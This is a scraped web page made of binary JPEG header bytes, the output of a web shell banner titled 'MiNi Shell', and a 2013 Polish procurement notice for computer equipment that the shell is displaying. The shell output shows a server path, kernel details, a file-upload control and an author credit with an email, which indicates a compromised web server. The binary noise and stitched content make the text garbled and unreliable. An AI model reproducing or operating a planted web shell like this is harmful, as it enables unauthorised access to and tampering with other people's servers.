JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130812/325066-N-2013.html

<p class="kh_header"><b>Zabrze: Dostawa elementów pomocniczych i eksploatacyjnych, nośników optycznych, nośników magnetycznych, komputerowych urządzeń wskazujących, multimedialnych urządzeń prezentacyjnych, drukarki, zestawów komputerowych, oprogramowania biurowego oraz oprogramowania specjalistycznego. Nr referencyjny nadany sprawie przez Zamawiającego 61/ichpw/2013</b><br>
<b>Numer ogłoszenia: 325066 - 2013; data zamieszczenia: 12.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Chemicznej Przeróbki Węgla , ul. Zamkowa 1, 41-803 Zabrze, woj. śląskie, tel. 032 2710041, faks 032 2710809.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ichpw.zabrze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elementów pomocniczych i eksploatacyjnych, nośników optycznych, nośników magnetycznych, komputerowych urządzeń wskazujących, multimedialnych urządzeń prezentacyjnych, drukarki, zestawów komputerowych, oprogramowania biurowego oraz oprogramowania specjalistycznego. Nr referencyjny nadany sprawie przez Zamawiającego 61/ichpw/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa sprzętu komputerowego w ilościach:
1.1.Zestaw: Komputer przenośny nr 1,
1.2.Zestaw: Komputer przenośny nr 2,
1.3.Zestaw: Komputer przenośny nr 3,
1.4.Zestaw: Komputer stacjonarny,
1.5.Rzutnik kieszonkowy,
1.6.Projektor multimedialny ( z funkcją tablicy interaktywnej ),
1.7.Zasilacz awaryjny UPS,
1.8.Skaner biurkowy,
1.9.Urządzenie do bezprzewodowego przekazywania obrazu wysokiej rozdzielczości,
1.10.Monitor,
1.11.Bateria do komputera HP,
1.12.Kabel synchronizacyjny telefon-komputer,
1.13.Stacja dokująca telefon-komputer,
1.14.Mysz bezprzewodowa,
1.15.Router WiFi,
1.16.Dysk 2,5 wewnętrzny nr 1,
1.17.Dysk 2,5 przenośny nr 1,
1.18.Dysk 2,5 przenośny nr 2,
1.19.Dysk 2,5 wewnętrzny nr 2,
1.20.Mysz optyczna,
1.21.Nośnik CD-R,
1.22.Nośnik DVD-R,
1.23.Projektor multimedialny,
1.24.Zewnętrzna kamera bezprzewodowa,
1.25.Oprogramowanie Microsoft Windows Server,
1.26.Oprogramowanie Microsoft Office 2013,
1.27.Zestaw rolek poboru papieru,
1.28.Fuser assembly kit,
1.29.Karta Graficzna,
1.30.Zestaw: Mysz + klawaitura,
1.31.Switch,
1.32.Program nr 1,
1.33.Program nr 2,
1.34.Drukarka.
2.Szczegółowy opis przedmiotu zamówienia przedstawiony został w załączniku nr 6 do SIWZ, który Wykonawca wypełnia i załącza do oferty.
3.Zamawiający wymaga udzielenia na przedmiot zamówienia minimalnej gwarancji na okres:
3.1.Zestaw: Komputer przenośny  nr 1 -  36 miesięcy,
3.2.Zestaw: Komputer przenośny nr 2 -  36 miesięcy,
3.3.Zestaw: Komputer przenośny nr 3 -  36 miesięcy,
3.4.Zestaw: Komputer stacjonarny -  36 miesięcy,
3.5.Rzutnik kieszonkowy -  36 miesięcy,
3.6.Projektor multimedialny ( z funkcją tablicy interaktywnej )-  36 miesięcy,
3.7.Zasilacz awaryjny UPS -  36 miesięcy,
3.8.Skaner biurkowy -  24 miesiące,
3.9.Urządzenie do bezprzewodowego przekazywania obrazu wysokiej rozdzielczości -  36 miesięcy,
3.10.Monitor -  24 miesiące,
3.11.Bateria do komputera HP -  24 miesiące,
3.12.Kabel synchronizacyjny telefon-komputer -  24 miesiące,
3.13.Stacja dokująca telefon-komputer -  24 miesiące,
3.14.Mysz bezprzewodowa -  24 miesiące,
3.15.Router WiFi -  24 miesiące,
3.16.Dysk 2,5 wewnętrzny nr 1 -  60 miesięcy,
3.17.Dysk 2,5 przenośny nr 1-  24 miesiące,
3.18.Dysk 2,5 przenośny nr 2 -  24 miesiące,
3.19.Dysk 2,5 wewnętrzny nr 2 -  60 miesięcy,
3.20.Mysz optyczna -  36 miesięcy,
3.21.Nośnik CD-R -  producenta,
3.22.Nośnik DVD-R -  producenta,
3.23.Projektor multimedialny -  36 miesięcy,
3.24.Zewnętrzna kamera bezprzewodowa -  24 miesiące,
3.25.Zestaw rolek poboru papieru -  producenta,
3.26.Fuser assembly kit -  producenta,
3.27.Karta Graficzna -  24 miesiące,
3.28.Zestaw: Mysz + klawaitura -  24 miesiące,
3.29.Switch -  60 miesięcy,
3.30.Drukarka - 24 miesiące.
4.Oferowane produkty muszą być fabrycznie nowe. 
5.Urządzenia muszą być kompletne, aby po zainstalowaniu wszystkich elementów urządzenie było gotowe do pracy, bez konieczności zakupu dodatkowych elementów przez Zamawiającego.
6.Produkty muszą być dostarczone do Zamawiającego na koszt Wykonawcy.
7.W cenie oferty powinny być uwzględnione wszelkie koszty dostawy m.in. opakowanie, ubezpieczenie, transport (wraz z wniesieniem do siedziby Zamawiającego).
8.Wykonawca będzie dokonywał napraw gwarancyjnych w miejscu użytkowania urządzenia chyba, że rodzaj uszkodzenia będzie wymagał naprawy w siedzibie Wykonawcy. Przewóz do i z miejsca naprawy następuje na koszt i ryzyko Wykonawcy. 
9.Wykonawca powinien zapewnić serwis gwarancyjny i pogwarancyjny zlokalizowany w Polsce, wykonywany przez autoryzowanego przedstawiciela producenta.
10.Wykonawca zapewnia czas reakcji serwisu od momentu zgłoszenia usterki maksymalnie 48 h. Przez czas reakcji serwisu rozumie się czas przystąpienia grupy serwisowej Wykonawcy do usuwania usterki lub awarii urządzenia po jej zdiagnozowaniu, liczony od chwili jej zgłoszenia. 
11.Wraz z dostawą produktów Wykonawca będzie zobowiązany do dostarczenia: kart gwarancyjnych, wszelkich atestów i deklaracji zgodności jeżeli są one wymagane prawem oraz instrukcji obsługi w języku polskim.
12.Oferowany komputer stacjonarny musi posiadać/spełniać:
12.1.Certyfikat, potwierdzający poprawną współpracę oferowanego modelu komputera z systemem operacyjnym Windows 7- należy załączyć do oferty (Zamawiający dopuszcza wydruk certyfikatu ze strony Microsoft WHCL),
12.2.Certyfikat ISO 14001 dla producenta sprzętu -  należy załączyć do oferty,
12.3.komputer musi spełniać wymogi normy Energy Star 5.0. Wymagany wpis dotyczący oferowanego modelu komputera w  internetowym katalogu  http://www.eu-energystar.org lub http://www.energystar.gov - należy załączyć potwierdzenie ze strony internetowej,
12.4.posiadać deklarację zgodności i posiadać oznakowanie CE - deklarację zgodności należy załączyć do oferty,
12.5.spełniać kryteria środowiskowe, w tym: zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji   niebezpiecznych,   zgodności   z normą   ISO   1043-4   dla   płyty   głównej oraz elementów  wykonanych  z  tworzyw  sztucznych  o masie  powyżej  25  g - należy załączyć do oferty stosowny dokument wydany przez producenta,
12.6.głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296  w pozycji operatora w trybie pracy dysku twardego (WORK) wynosząca maksymalnie 22 dB- należy załączyć do oferty stosowny dokument wydany przez producenta,
12.7.moduł   konstrukcji   obudowy   w   jednostce   centralnej   komputera   powinien   pozwalać na demontaż kart rozszerzeń i napędów bez konieczności użycia narzędzi (wyklucza się użycia wkrętów, śrub motylkowych),
12.8.obudowa  w  jednostce  centralnej  musi  być  otwierana  bez  konieczności  użycia  narzędzi (wyklucza się użycie standardowych wkrętów, śrub motylkowych),
12.9.obudowa   musi   umożliwiać   zastosowanie   zabezpieczenia   fizycznego   w   postaci   linki metalowej (złącze blokady Kensingtona) oraz kłódki (oczko w obudowie do założenia kłódki). Obudowa musi być wyposażona w zamek który nie wystaje poza obrys obudowy.
13.Oferowany zasilacz awaryjny UPS musi posiadać/spełniać:
13.1.Certyfikat ISO 9001:2008 dla producenta sprzętu obejmujący proces projektowania, produkcji i serwisowania - należy załączyć do oferty,
13.2.posiadać deklarację zgodności i posiadać oznakowanie CE - deklarację zgodności należy załączyć do oferty,
13.3.Zamawiający wymaga załączenia do oferty opisu technicznego produktu.
14.Oferowane projektory multimedialne (wymienione w pkt. 1.6. oraz 1.23 SIWZ) muszą posiadać/spełniać:
14.1.Wykonawca powinien posiadać zobowiązanie Producenta projektorów, że w przypadku nie wywiązania się z zobowiązań gwarancyjnych w stosunku do Zamawiającego, Producent przejmie jego zobowiązania gwarancyjne - należy załączyć do oferty stosowny dokument,
14.2.projektory muszą posiadać możliwość serwisowania na terenie RP przez firmy z certyfikatami ISO 9001:2000 na świadczenie usług serwisowych oraz posiadające autoryzacje producenta projektora - należy załączyć do oferty stosowny dokument.
15.Wykonawca zobowiązany jest załączyć do oferty wypełniony Załącznik nr 1a do SIWZ -  Formularz cenowy.
16.Wykonawca zobowiązany jest do bezwzględnego zagwarantowania spełnienia warunków jakościowych na dostarczony przedmiot zamówienia.
17.Przedmiot zamówienia będzie realizowany po cenach określonych w ofercie. 
18.Przedstawione wyroby, w których zostały użyte znaki towarowe można zastąpić produktami równoważnymi.
18.1.W wypadku zastosowania produktu równoważnego Wykonawca powinien wykazać równoważność 
w stosunku do produktu wskazanego w SIWZ, w formie pisemnej. 
18.2.Za równoważny przedmiot zamówienia Zamawiający uzna oferowany przedmiot zamówienia o cechach (parametrach) nie gorszych niż określony w SIWZ. 
18.3.W przypadku równoważnego przedmiotu zamówienia Wykonawca winien dołączyć do oferty dane umożliwiające jego porównanie z parametrami odpowiedniej pozycji z opisu przedmiotu zamówienia stanowiącego załącznik nr 6 do niniejszej SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.13.10-3, 30.23.21.00-5, 30.23.72.00-1, 30.23.40.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w postępowaniu o udzielenie zamówienia publicznego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa opisu sposobu dokonywania oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa opisu sposobu dokonywania oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa opisu sposobu dokonywania oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa opisu sposobu dokonywania oceny spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany Formularz ofertowy - wzór druku formularza stanowi załącznik nr 1 do SIWZ,
2.Wypełniony i podpisany Formularz cenowy stanowiący załącznik nr 1a do SIWZ
3.Wypełnione i podpisane oświadczenia oraz dokumenty wymienione w pkt 11 SIWZ,
4.Wypełniony i podpisany załącznik nr 6 do SIWZ,
5.W przypadku równoważnego przedmiotu zamówienia Wykonawca winien dołączyć do oferty dane umożliwiające jego porównanie z właściwościami (cechami, parametrami) odpowiedniej pozycji z opisu przedmiotu zamówienia,
6.Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru,
7.Zamawiający żąda przedstawienia wraz z ofertą. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
8.W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego:
8.1.opisów produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez Wykonawcę na żądanie Zamawiającego (dotyczy pkt. 5.13.3. SIWZ),
8.2.zaświadczenia niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczone produkty odpowiadają określonym normom lub specyfikacjom technicznym zgodnie z  pkt. 5.12.1., 5.12.2., 5.12.4., 5.13.1. i 5.13.2.SIWZ.
9. Dokumenty o których mowa w pkt.5.14.SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ichpw.zabrze.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Chemicznej Przeróbki Węgla
41-803 Zabrze, ul. Zamkowa 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2013 godzina 10:00, miejsce: Instytut Chemicznej Przeróbki Węgla
41-803 Zabrze, ul. Zamkowa 1, pok.111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt nr POIG.01.01.02-24-017/08, tytuł projektu: Inteligentna koksownia spełniająca wymagania najlepszej dostępnej techniki realizowanego w ramach Programu Operacyjnego Innowacyjna Gospodarka, lata 2007 - 2013, Priorytet 1 - Badania i rozwój nowoczesnych technologii, Działanie 1.1 - Wsparcie badań naukowych dla budowy gospodarki opartej na wiedzy, Poddziałanie 1.1.2 - Strategiczne programy badań naukowych i prac rozwojowych. Projekt jest współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego i publicznych środków krajowych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com